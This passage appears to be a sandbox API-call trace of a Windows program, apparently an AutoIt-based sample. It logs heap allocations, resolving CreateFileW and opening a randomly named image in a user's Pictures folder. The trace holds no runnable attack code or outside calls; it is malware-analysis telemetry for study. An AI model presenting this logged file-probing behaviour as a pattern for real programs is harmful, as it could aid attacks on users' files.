1 [0094.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0094.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0094.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23f0 [0094.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d58 [0094.890] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0094.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf798 [0094.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2360 [0094.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0094.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0094.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0094.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0094.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca100 [0094.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0094.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0094.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0094.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0094.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0094.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca058 [0094.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0094.891] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0094.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0094.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0094.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23e0 [0094.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f20 [0094.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0094.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0094.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23f0 [0094.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e38 [0094.891] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0094.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0094.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e23f0 [0094.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0094.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fe0 [0094.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0094.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f68 [0094.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2400 [0094.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca148 [0094.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0094.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2330 [0094.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca070 [0094.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0094.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9f50 [0094.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0094.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0094.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0094.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0094.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0094.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0094.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0094.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0094.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0094.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0094.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0094.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0094.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0094.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24c0 [0094.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0094.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0094.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0094.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0094.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0094.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0094.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0094.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0094.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0094.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0094.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ab8 [0094.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0094.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0094.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0094.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0094.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0094.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0094.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0094.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0094.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0094.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0094.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0094.894] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0094.894] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0094.894] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0094.894] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0094.894] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0094.894] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0094.894] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0094.894] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0094.894] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0094.894] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0094.894] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0094.894] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0094.894] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0094.894] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0094.894] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0094.894] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0094.894] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0094.894] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0094.894] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0094.894] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0094.894] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0094.894] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0094.894] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0094.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0094.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0094.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0094.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0094.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0094.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0094.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0094.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0094.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0094.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0094.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0094.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0094.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0094.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0094.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0094.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0094.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0094.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0094.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0094.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0094.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0094.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0094.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0094.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0094.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0094.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0094.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0094.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0094.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0094.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0094.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0094.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0094.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0094.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0094.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0094.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0094.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0094.896] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0094.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0094.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0094.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0094.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0094.897] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0094.897] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0094.897] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0094.897] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0094.897] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0094.897] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0094.897] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0094.897] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0094.897] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0094.897] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0094.897] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0094.897] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0094.897] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0094.897] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0094.897] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0094.897] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0094.897] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0094.897] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0094.897] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0094.897] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0094.897] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0094.897] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0094.897] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0094.897] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0094.898] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0094.898] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0094.898] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0094.898] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0094.898] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0094.898] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0094.898] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0094.898] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0094.898] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0094.898] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0094.898] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0094.898] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0094.898] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0094.898] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0094.898] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.898] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8b0 [0094.898] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca8b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0094.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0094.899] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0094.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0094.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0094.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0094.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0094.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0094.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0094.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0094.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0094.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0094.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0094.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0094.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0094.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0094.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0094.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0094.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0094.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0094.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0094.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0094.900] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\X0f8JSrsqtdBsB.png" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\x0f8jsrsqtdbsb.png"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0094.900] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0094.900] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea2e0 [0094.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0094.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0094.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0094.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0094.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0094.908] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0094.908] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0094.908] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0094.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0094.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0094.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0094.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0094.909] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0094.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431daa0 [0094.909] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0094.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0094.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0094.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0094.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0094.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0094.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0094.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0094.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0094.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0094.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0094.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0094.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0094.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0094.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0094.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0094.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0094.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0094.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0094.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0094.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0094.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0094.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0094.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0094.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0094.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0094.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0094.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0094.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0094.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0094.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0094.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0094.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0094.948] 